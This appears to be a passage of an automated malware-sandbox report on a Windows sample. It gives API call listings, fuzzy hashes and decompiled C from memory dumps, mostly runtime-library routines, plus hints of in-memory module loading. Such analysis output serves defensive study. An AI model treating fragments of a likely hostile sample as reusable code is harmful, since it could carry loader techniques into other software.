      • Part of subcall function 6D867CC2: GetLastError.KERNEL32(?,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?,?), ref: 6D867CEA
    • _free.LIBCMT ref: 6D86AA90
    • _free.LIBCMT ref: 6D86AAA5
    • _free.LIBCMT ref: 6D86AAB0
    • _free.LIBCMT ref: 6D86AAD2
    • _free.LIBCMT ref: 6D86AAE5
    • _free.LIBCMT ref: 6D86AAF3
    • _free.LIBCMT ref: 6D86AAFE
    • _free.LIBCMT ref: 6D86AB36
    • _free.LIBCMT ref: 6D86AB3D
    • _free.LIBCMT ref: 6D86AB5A
    • _free.LIBCMT ref: 6D86AB72
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: f6b88d86db99aa36c96861b09ebfcb0b6474ae7e65f8983a9efb5f7106ac695b
    • Instruction ID: ee4d4dd06feb3a2be55e3f2adc3fd7505e559aa64ef6e10c2d870cbce6e83c28
    • Opcode Fuzzy Hash: f6b88d86db99aa36c96861b09ebfcb0b6474ae7e65f8983a9efb5f7106ac695b
    • Instruction Fuzzy Hash: A2312C31A08292AFEB219B39DD48F6A77E9EF00364F129C2AF155D6650DF74E880C770
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • IsInExceptionSpec.LIBVCRUNTIME ref: 0304F85F
    • type_info::operator==.LIBVCRUNTIME ref: 0304F886
    • ___TypeMatch.LIBVCRUNTIME ref: 0304F992
    • CatchIt.LIBVCRUNTIME ref: 0304F9E7
    • IsInExceptionSpec.LIBVCRUNTIME ref: 0304FA6D
    • _UnwindNestedFrames.LIBCMT ref: 0304FAF4
    • CallUnexpected.LIBVCRUNTIME ref: 0304FB0F
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 4234981820-393685449
    • Opcode ID: e56c2110e8d1681883f59d7834123c8a7915506eff59a259606ad53ed0ecaac7
    • Instruction ID: 2fb04d323df2ce88dd5daef84b5edb72bf27865d30197883d2aa153296a23616
    • Opcode Fuzzy Hash: e56c2110e8d1681883f59d7834123c8a7915506eff59a259606ad53ed0ecaac7
    • Instruction Fuzzy Hash: 8EC16CB580221AEFCF55DFA4C9809AEBBB9FF44310F18416AE8416B211D731DB61CFA1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • IsInExceptionSpec.LIBVCRUNTIME ref: 0306653D
    • type_info::operator==.LIBVCRUNTIME ref: 03066564
    • ___TypeMatch.LIBVCRUNTIME ref: 03066670
    • CatchIt.LIBVCRUNTIME ref: 030666C5
    • IsInExceptionSpec.LIBVCRUNTIME ref: 0306674B
    • _UnwindNestedFrames.LIBCMT ref: 030667D2
    • CallUnexpected.LIBVCRUNTIME ref: 030667ED
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 4234981820-393685449
    • Opcode ID: 1dc0012f9c07c70d5faee492c504dd24b4ba17d0f4e065b635bd4689a8213fe1
    • Instruction ID: 437455de5469d5040fb1867e5e286b3a37c1cac59408107905ba0c706bae3080
    • Opcode Fuzzy Hash: 1dc0012f9c07c70d5faee492c504dd24b4ba17d0f4e065b635bd4689a8213fe1
    • Instruction Fuzzy Hash: E8C17B7580235DAFCF25DFA4C8809AEBBB9BF44310F0841AAE8116B259D736D951CFA1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 117ec8358a2dafbb9cda0602a73be354d0561a856dcd5d6939cc32adeb23cab9
    • Instruction ID: ee83b62414a1871c2c8c7d5d4926331c372f5e1daa0bbd417bc2dd415050bf6a
    • Opcode Fuzzy Hash: 117ec8358a2dafbb9cda0602a73be354d0561a856dcd5d6939cc32adeb23cab9
    • Instruction Fuzzy Hash: 0C2194BA912208EFDB41EFA4C880DDE7BF9BF49640F4041A6B5159F120DB31EA55CB80
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: b2bdb1a8e34bda54239e70590d71994a77a27cfb5aeafa729add2a7b0229828f
    • Instruction ID: 94e5ada16dac8f61f96ccfeb06d1c5099719359af385dd543383083219ba19ce
    • Opcode Fuzzy Hash: b2bdb1a8e34bda54239e70590d71994a77a27cfb5aeafa729add2a7b0229828f
    • Instruction Fuzzy Hash: 4B21987A94120CEFCF45EF96DC81EDE7BB9AF48240B00456AB9169F120DB31EA44DB80
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: e13d822b31705fabba071e32b405701268736af50b543b0c51fc7eafe0a65dcc
    • Instruction ID: c700ba24538bc1bb3369648204e64944799de60007897718768d3cd8dbe149c3
    • Opcode Fuzzy Hash: e13d822b31705fabba071e32b405701268736af50b543b0c51fc7eafe0a65dcc
    • Instruction Fuzzy Hash: AE21B77A912208EFCB41EF94C880DDE7BF9BF48250F0081A6F5159F164DB72EA94DB84
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E6D867F22(void* __esi, char _a4) {
    				void* _v5;
    				char _v12;
    				char _v16;
    				char _v20;
    				void* __ebp;
    				char _t55;
    				char _t61;
    				intOrPtr _t67;
    				void* _t71;
    
    				_t71 = __esi;
    				_t36 = _a4;
    				_t67 =  *_a4;
    				_t75 = _t67 - 0x6d871070;
    				if(_t67 != 0x6d871070) {
    					E6D867CC2(_t67);
    					_t36 = _a4;
    				}
    				E6D867CC2( *((intOrPtr*)(_t36 + 0x3c)));
    				E6D867CC2( *((intOrPtr*)(_a4 + 0x30)));
    				E6D867CC2( *((intOrPtr*)(_a4 + 0x34)));
    				E6D867CC2( *((intOrPtr*)(_a4 + 0x38)));
    				E6D867CC2( *((intOrPtr*)(_a4 + 0x28)));
    				E6D867CC2( *((intOrPtr*)(_a4 + 0x2c)));
    				E6D867CC2( *((intOrPtr*)(_a4 + 0x40)));
    				E6D867CC2( *((intOrPtr*)(_a4 + 0x44)));
    				E6D867CC2( *((intOrPtr*)(_a4 + 0x360)));
    				_v16 =  &_a4;
    				_t55 = 5;
    				_v12 = _t55;
    				_v20 = _t55;
    				_push( &_v12);
    				_push( &_v16);
    				_push( &_v20);
    				E6D867D4E(_t75);
    				_v16 =  &_a4;
    				_t61 = 4;
    				_v20 = _t61;
    				_v12 = _t61;
    				_push( &_v20);
    				_push( &_v16);
    				_push( &_v12);
    				return E6D867DB9(_t71, _t75);
    			}












    0x6d867f22
    0x6d867f27
    0x6d867f2d
    0x6d867f2f
    0x6d867f35
    0x6d867f38
    0x6d867f3d
    0x6d867f40
    0x6d867f44
    0x6d867f4f
    0x6d867f5a
    0x6d867f65
    0x6d867f70
    0x6d867f7b
    0x6d867f86
    0x6d867f91
    0x6d867f9f
    0x6d867faa
    0x6d867fb2
    0x6d867fb3
    0x6d867fb6
    0x6d867fbc
    0x6d867fc0
    0x6d867fc4
    0x6d867fc5
    0x6d867fcf
    0x6d867fd5
    0x6d867fd6
    0x6d867fd9
    0x6d867fdf
    0x6d867fe3
    0x6d867fe7
    0x6d867fee

    APIs
    • _free.LIBCMT ref: 6D867F38
      • Part of subcall function 6D867CC2: HeapFree.KERNEL32(00000000,00000000,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?), ref: 6D867CD8
      • Part of subcall function 6D867CC2: GetLastError.KERNEL32(?,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?,?), ref: 6D867CEA
    • _free.LIBCMT ref: 6D867F44
    • _free.LIBCMT ref: 6D867F4F
    • _free.LIBCMT ref: 6D867F5A
    • _free.LIBCMT ref: 6D867F65
    • _free.LIBCMT ref: 6D867F70
    • _free.LIBCMT ref: 6D867F7B
    • _free.LIBCMT ref: 6D867F86
    • _free.LIBCMT ref: 6D867F91
    • _free.LIBCMT ref: 6D867F9F
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 2325a14de87782447ae8c7d949414f517871c7ea2c1bc6085c2578f2021d169c
    • Instruction ID: 9f1c941229c2850acb71d08c5e5e66c2d1c3e2702bb641577a4582f3b86ea5b8
    • Opcode Fuzzy Hash: 2325a14de87782447ae8c7d949414f517871c7ea2c1bc6085c2578f2021d169c
    • Instruction Fuzzy Hash: CB21B576A04148BFCB41DFA8CC94EDE7BB9BF08354F0159A6F6159B620DB31EA44CB90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • RtlDecodePointer.NTDLL(?), ref: 0304092C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: DecodePointer
    • String ID: acos$asin$exp$log$log10$pow$sqrt
    • API String ID: 3527080286-3064271455
    • Opcode ID: 39a0655306f91d10538c74b5a03b6a5c27f2db7c5b9ac1ac496cef12ca8eb627
    • Instruction ID: 2c3f3e5a889d47dc28685aca7fe5d5592336df33625c189730c24307ee9d297e
    • Opcode Fuzzy Hash: 39a0655306f91d10538c74b5a03b6a5c27f2db7c5b9ac1ac496cef12ca8eb627
    • Instruction Fuzzy Hash: 81517AF090260ACBDF10DFA9D94C2AEFBB4FB45304F0945B5D681BA268CB748769CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E2FF119A0(void* __ecx, intOrPtr* _a4, struct HINSTANCE__** _a8, CHAR* _a12) {
    				signed int _v8;
    				struct HINSTANCE__* _t16;
    				_Unknown_base(*)()* _t17;
    				struct HINSTANCE__* _t18;
    				long _t19;
    				intOrPtr* _t20;
    				struct HINSTANCE__** _t28;
    
    				_v8 = _v8 & 0x00000000;
    				if( *0x2ff13028 == 0) {
    					if(GetVersion() < 0) {
    						GetFileAttributesW(L"???.???");
    						 *0x2ff13024 = GetModuleHandleA("Unicows.dll");
    					}
    					 *0x2ff13028 = 1;
    				}
    				_t16 =  *0x2ff13024;
    				if(_t16 != 0) {
    					_t17 = GetProcAddress(_t16, _a12);
    					_v8 = _t17;
    					if(_t17 == 0) {
    						goto L2;
    					}
    					goto L5;
    				} else {
    					L2:
    					_t28 = _a8;
    					_t18 =  *_t28;
    					if(_t18 == 0) {
    						_t19 = GetVersion();
    						_t20 = _a4;
    						if(_t19 < 0) {
    							_t18 =  *((intOrPtr*)(_t20 + 8))( *((intOrPtr*)(_t20 + 0xc)));
    						} else {
    							_t18 =  *_t20( *((intOrPtr*)(_t20 + 4)));
    						}
    						if(_t18 == 0) {
    							L4:
    							L5:
    							return _v8;
    						}
    						 *_t28 = _t18;
    					}
    					_v8 = GetProcAddress(_t18, _a12);
    					goto L4;
    				}
    			}










    0x2ff119a4
    0x2ff119b7
    0x2ff119ed
    0x2ff11bb0
    0x2ff11bc1
    0x2ff11bc1
    0x2ff119f3
    0x2ff119f3
    0x2ff119b9
    0x2ff119c6
    0x2ff11bcf
    0x2ff119ff
    0x2ff11a04
    0x00000000
    0x00000000
    0x00000000
    0x2ff119cc
    0x2ff119cc
    0x2ff119cd
    0x2ff119d0
    0x2ff119d4
    0x2ff11a08
    0x2ff11a0c
    0x2ff11a0f
    0x2ff11bd9
    0x2ff11a15
    0x2ff11a18
    0x2ff11a18
    0x2ff11a1c
    0x2ff119df
    0x2ff119e0
    0x2ff119e6
    0x2ff119e6
    0x2ff11a1e
    0x2ff11a1e
    0x2ff119dc
    0x00000000
    0x2ff119dc

    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 2FF119DA
    • GetVersion.KERNEL32(00000000,00000000,?,?,2FF11989,2FF11990,2FF1302C,?,?,2FF11AFC,DeactivateActCtx,?,2FF11B5E,00000000,?,2FF1169A), ref: 2FF119E9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true
    • Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressProcVersion
    • String ID: ???.???$Unicows.dll
    • API String ID: 2540053943-2162356649
    • Opcode ID: 632d210f6f14d2adedb2260f6c5cb725913026ab7f67934f2d74ef512f2fdecd
    • Instruction ID: 339e035084594a8562ad4747fc3758a43bbbebcd9cdbcd2a347de521d34f15a7
    • Opcode Fuzzy Hash: 632d210f6f14d2adedb2260f6c5cb725913026ab7f67934f2d74ef512f2fdecd
    • Instruction Fuzzy Hash: 1A111F32904206EFFB10DFA6C884E4BBBFEAF043A9B154556E614D2320E739D510DB61
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SetLastError.KERNEL32(000000C1,01671240,03049C68,00000145,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03032059
      • Part of subcall function 03031934: SetLastError.KERNEL32(0000000D,03031E28,01671240,03049C68,00000145,?,?,?,?,?,?,?,?,?,?,03031874), ref: 0303193E
    • GetNativeSystemInfo.KERNEL32(?,01671240,03049C68,00000145,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03031E92
    • VirtualAlloc.KERNEL32(10000000,0001C000,00003000,00000004,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03031EC2
    • VirtualAlloc.KERNEL32(00000000,0001C000,00003000,00000004,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03031EDA
    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03031EF4
    • RtlAllocateHeap.NTDLL(00000000), ref: 03031EFB
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03031F0E
    • VirtualAlloc.KERNEL32(00000000,00000400,00001000,00000004,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03031F6E
    • SetLastError.KERNEL32(0000045A), ref: 03032031
      • Part of subcall function 030321C2: GetProcessHeap.KERNEL32(00000000,00000000,03061AA8,00000000,0303203E,?,?,?,?,?,?,?,?,?,?,03031874), ref: 03032238
      • Part of subcall function 030321C2: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,03031874), ref: 0303223F
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: HeapVirtual$AllocErrorLast$FreeProcess$AllocateInfoNativeSystem
    • String ID:
    • API String ID: 3990409966-0
    • Opcode ID: bf016e62ab59a736d3381d8da555859834f43f21af0643d44ee3ce40e2f86000
    • Instruction ID: 514f40557b971240b1fcfe63822767e9cd9cdfcb54bc60bf357a0606fffc8aa0
    • Opcode Fuzzy Hash: bf016e62ab59a736d3381d8da555859834f43f21af0643d44ee3ce40e2f86000
    • Instruction Fuzzy Hash: 60713138603201DFCB54EF66C984BA9B7FDBF4A344F184458E9019B286D774E81ACB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 27%
    			E2FF114E5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _t16;
    				intOrPtr _t21;
    				intOrPtr* _t35;
    				intOrPtr* _t36;
    				void* _t37;
    
    				E2FF11310(__ebx, __edi, __esi);
    				_t35 = __imp___decode_pointer;
    				_t16 =  *_t35( *0x2ff1307c, 0x2ff11520, 0x14);
    				 *((intOrPtr*)(_t37 - 0x1c)) = _t16;
    				if(_t16 != 0xffffffff) {
    					L2FF125AA();
    					 *(_t37 - 4) =  *(_t37 - 4) & 0x00000000;
    					 *((intOrPtr*)(_t37 - 0x1c)) =  *_t35( *0x2ff1307c, 8);
    					 *((intOrPtr*)(_t37 - 0x20)) =  *_t35( *0x2ff13078);
    					_t36 = __imp___encode_pointer;
    					_t21 =  *_t36( *((intOrPtr*)(_t37 + 8)), _t37 - 0x1c, _t37 - 0x20);
    					L2FF125A4();
    					 *((intOrPtr*)(_t37 - 0x24)) = _t21;
    					 *0x2ff1307c =  *_t36( *((intOrPtr*)(_t37 - 0x1c)), _t21);
    					 *0x2ff13078 =  *_t36( *((intOrPtr*)(_t37 - 0x20)));
    					 *(_t37 - 4) = 0xfffffffe;
    					E2FF11EDA(_t23);
    					_t16 =  *((intOrPtr*)(_t37 - 0x24));
    				} else {
    					__imp___onexit( *((intOrPtr*)(_t37 + 8)));
    				}
    				return E2FF1153C(_t16);
    			}








    0x2ff114ec
    0x2ff114f7
    0x2ff114fd
    0x2ff11500
    0x2ff11506
    0x2ff11e70
    0x2ff11e76
    0x2ff11e82
    0x2ff11e8f
    0x2ff11e9d
    0x2ff11ea3
    0x2ff11ea7
    0x2ff11eac
    0x2ff11eb4
    0x2ff11ec1
    0x2ff11ec6
    0x2ff11ecd
    0x2ff11ed2
    0x2ff1150c
    0x2ff1150f
    0x2ff11515
    0x2ff1151b

    APIs
    • _decode_pointer.MSVCR90(2FF11520,00000014,2FF114DB,?), ref: 2FF114FD
    • _onexit.MSVCR90 ref: 2FF1150F
    • _lock.MSVCR90 ref: 2FF11E70
    • _decode_pointer.MSVCR90 ref: 2FF11E80
    • _decode_pointer.MSVCR90 ref: 2FF11E8B
    • _encode_pointer.MSVCR90(?,?,?), ref: 2FF11EA3
    • __dllonexit.MSVCR90 ref: 2FF11EA7
    • _encode_pointer.MSVCR90(?,00000000), ref: 2FF11EB2
    • _encode_pointer.MSVCR90(?), ref: 2FF11EBC
    Memory Dump Source
    • Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true
    • Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _decode_pointer_encode_pointer$__dllonexit_lock_onexit
    • String ID:
    • API String ID: 4020643893-0
    • Opcode ID: f8a7ec8c2702b84240aa030fc271b1d7525bfe0d13e0915ef48281983cb5b601
    • Instruction ID: bab6bbe327435ffce8e7ecacf3cbc93894f2426dd88f164405b515c3697afdb0
    • Opcode Fuzzy Hash: f8a7ec8c2702b84240aa030fc271b1d7525bfe0d13e0915ef48281983cb5b601
    • Instruction Fuzzy Hash: 0911BA72C10218EFEF05DFB5EC41A9F7BBAEF08364F114126E555A62A0DB396A109F60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 48%
    			E6D865090(void* __ecx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v5;
    				signed int _v8;
    				signed int _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v32;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t65;
    				void* _t68;
    				signed int _t75;
    				intOrPtr _t76;
    				void* _t77;
    				signed int _t78;
    				intOrPtr _t80;
    				signed int _t83;
    				signed int _t87;
    				intOrPtr* _t90;
    				intOrPtr _t91;
    				intOrPtr _t92;
    				signed int _t95;
    				char _t97;
    				signed int _t103;
    				signed int _t104;
    				signed int _t112;
    				void* _t114;
    				intOrPtr _t115;
    				intOrPtr _t116;
    				signed int _t118;
    				void* _t119;
    				void* _t120;
    				void* _t126;
    
    				_t90 = _a4;
    				_v5 = 0;
    				_v16 = 1;
    				 *_t90 = E6D86F4C7(__ecx,  *_t90);
    				_t91 = _a8;
    				_t6 = _t91 + 0x10; // 0x11
    				_t116 = _t6;
    				_t65 =  *(_t91 + 8) ^  *0x6d877014;
    				_push(_t116);
    				_push(_t65);
    				_v20 = _t116;
    				_v12 = _t65;
    				E6D865050(_t114, _t116);
    				E6D866223(_a12);
    				_t68 = _a4;
    				_t120 = _t119 + 0x10;
    				_t115 =  *((intOrPtr*)(_t91 + 0xc));
    				if(( *(_t68 + 4) & 0x00000066) != 0) {
    					__eflags = _t115 - 0xfffffffe;
    					if(_t115 != 0xfffffffe) {
    						E6D86620C(_t91, 0xfffffffe, _t116, 0x6d877014);
    						goto L13;
    					}
    					goto L14;
    				} else {
    					_v32 = _t68;
    					_v28 = _a12;
    					 *((intOrPtr*)(_t91 - 4)) =  &_v32;
    					if(_t115 == 0xfffffffe) {
    						L14:
    						return _v16;
    					} else {
    						do {
    							_t95 = _v12;
    							_t75 = _t115 + (_t115 + 2) * 2;
    							_t92 =  *((intOrPtr*)(_t95 + _t75 * 4));
    							_t76 = _t95 + _t75 * 4;
    							_t96 =  *((intOrPtr*)(_t76 + 4));
    							_v24 = _t76;
    							if( *((intOrPtr*)(_t76 + 4)) == 0) {
    								_t97 = _v5;
    								goto L7;
    							} else {
    								_t77 = E6D8661BC(_t96, _t116);
    								_t97 = 1;
    								_v5 = 1;
    								_t126 = _t77;
    								if(_t126 < 0) {
    									_v16 = 0;
    									L13:
    									_push(_t116);
    									_push(_v12);
    									E6D865050(_t115, _t116);
    									goto L14;
    								} else {
    									if(_t126 > 0) {
    										_t78 = _a4;
    										__eflags =  *_t78 - 0xe06d7363;
    										if( *_t78 == 0xe06d7363) {
    											__eflags =  *0x6d87044c;
    											if(__eflags != 0) {
    												_t87 = E6D86EC60(__eflags, 0x6d87044c);
    												_t120 = _t120 + 4;
    												__eflags = _t87;
    												if(_t87 != 0) {
    													_t118 =  *0x6d87044c; // 0x6d8651ee
    													 *0x6d870168(_a4, 1);
    													 *_t118();
    													_t116 = _v20;
    													_t120 = _t120 + 8;
    												}
    												_t78 = _a4;
    											}
    										}
    										E6D8661F0(_t78, _a8, _t78);
    										_t80 = _a8;
    										__eflags =  *((intOrPtr*)(_t80 + 0xc)) - _t115;
    										if( *((intOrPtr*)(_t80 + 0xc)) != _t115) {
    											E6D86620C(_t80, _t115, _t116, 0x6d877014);
    											_t80 = _a8;
    										}
    										_push(_t116);
    										_push(_v12);
    										 *((intOrPtr*)(_t80 + 0xc)) = _t92;
    										E6D865050(_t115, _t116);
    										E6D8661D4();
    										asm("int3");
    										E6D864EC0(0x6d8755e8, 8);
    										_t83 = _a4;
    										__eflags = _t83;
    										if(_t83 != 0) {
    											__eflags =  *_t83 - 0xe06d7363;
    											if( *_t83 == 0xe06d7363) {
    												__eflags =  *((intOrPtr*)(_t83 + 0x10)) - 3;
    												if( *((intOrPtr*)(_t83 + 0x10)) == 3) {
    													__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930520;
    													if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930520) {
    														L28:
    														_t103 =  *(_t83 + 0x1c);
    														__eflags = _t103;
    														if(_t103 != 0) {
    															_t112 =  *(_t103 + 4);
    															__eflags = _t112;
    															if(_t112 == 0) {
    																__eflags =  *_t103 & 0x00000010;
    																if(( *_t103 & 0x00000010) != 0) {
    																	_t83 =  *(_t83 + 0x18);
    																	_t104 =  *_t83;
    																	__eflags = _t104;
    																	if(_t104 != 0) {
    																		 *0x6d870168(_t104);
    																		_t83 =  *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))();
    																	}
    																}
    															} else {
    																_t54 =  &_v8;
    																 *_t54 = _v8 & 0x00000000;
    																__eflags =  *_t54;
    																_t83 = E6D86528F( *(_t83 + 0x18), _t112);
    																_v8 = 0xfffffffe;
    															}
    														}
    													} else {
    														__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930521;
    														if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930521) {
    															goto L28;
    														} else {
    															__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930522;
    															if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930522) {
    																goto L28;
    															}
    														}
    													}
    												}
    											}
    										}
    										 *[fs:0x0] = _v20;
    										return _t83;
    									} else {
    										goto L7;
    									}
    								}
    							}
    							goto L36;
    							L7:
    							_t115 = _t92;
    						} while (_t92 != 0xfffffffe);
    						if(_t97 != 0) {
    							goto L13;
    						}
    						goto L14;
    					}
    				}
    				L36:
    			}






































    0x6d865097
    0x6d86509c
    0x6d8650a2
    0x6d8650ae
    0x6d8650b0
    0x6d8650b6
    0x6d8650b6
    0x6d8650b9
    0x6d8650bf
    0x6d8650c0
    0x6d8650c1
    0x6d8650c4
    0x6d8650c7
    0x6d8650cf
    0x6d8650d4
    0x6d8650d7
    0x6d8650da
    0x6d8650e1
    0x6d86513d
    0x6d865140
    0x6d86514f
    0x00000000
    0x6d86514f
    0x00000000
    0x6d8650e3
    0x6d8650e3
    0x6d8650e9
    0x6d8650ef
    0x6d8650f5
    0x6d865160
    0x6d865169
    0x6d8650f7
    0x6d8650f7
    0x6d8650f7
    0x6d8650fd
    0x6d865100
    0x6d865103
    0x6d865106
    0x6d865109
    0x6d86510e
    0x6d865124
    0x00000000
    0x6d865110
    0x6d865112
    0x6d865117
    0x6d865119
    0x6d86511c
    0x6d86511e
    0x6d865134
    0x6d865154
    0x6d865154
    0x6d865155
    0x6d865158
    0x00000000
    0x6d865120
    0x6d865120
    0x6d86516a
    0x6d86516d
    0x6d865173
    0x6d865175
    0x6d86517c
    0x6d865183
    0x6d865188
    0x6d86518b
    0x6d86518d
    0x6d86518f
    0x6d86519c
    0x6d8651a2
    0x6d8651a4
    0x6d8651a7
    0x6d8651a7
    0x6d8651aa
    0x6d8651aa
    0x6d86517c
    0x6d8651b2
    0x6d8651b7
    0x6d8651ba
    0x6d8651bd
    0x6d8651c9
    0x6d8651ce
    0x6d8651ce
    0x6d8651d1
    0x6d8651d2
    0x6d8651d5
    0x6d8651d8
    0x6d8651e8
    0x6d8651ed
    0x6d8651f5
    0x6d8651fa
    0x6d8651fd
    0x6d8651ff
    0x6d865201
    0x6d865207
    0x6d865209
    0x6d86520d
    0x6d86520f
    0x6d865216
    0x6d86522a
    0x6d86522a
    0x6d86522d
    0x6d86522f
    0x6d865231
    0x6d865234
    0x6d865236
    0x6d865261
    0x6d865264
    0x6d865266
    0x6d865269
    0x6d86526b
    0x6d86526d
    0x6d865277
    0x6d86527d
    0x6d86527d
    0x6d86526d
    0x6d865238
    0x6d865238
    0x6d865238
    0x6d865238
    0x6d865240
    0x6d865245
    0x6d865245
    0x6d865236
    0x6d865218
    0x6d865218
    0x6d86521f
    0x00000000
    0x6d865221
    0x6d865221
    0x6d865228
    0x00000000
    0x00000000
    0x6d865228
    0x6d86521f
    0x6d865216
    0x6d86520d
    0x6d865207
    0x6d865282
    0x6d86528e
    0x6d865122
    0x00000000
    0x6d865122
    0x6d865120
    0x6d86511e
    0x00000000
    0x6d865127
    0x6d865127
    0x6d865129
    0x6d865130
    0x00000000
    0x6d865132
    0x00000000
    0x6d865130
    0x6d8650f5
    0x00000000

    APIs
    • _ValidateLocalCookies.LIBCMT ref: 6D8650C7
    • ___except_validate_context_record.LIBVCRUNTIME ref: 6D8650CF
    • _ValidateLocalCookies.LIBCMT ref: 6D865158
    • __IsNonwritableInCurrentImage.LIBCMT ref: 6D865183
    • _ValidateLocalCookies.LIBCMT ref: 6D8651D8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
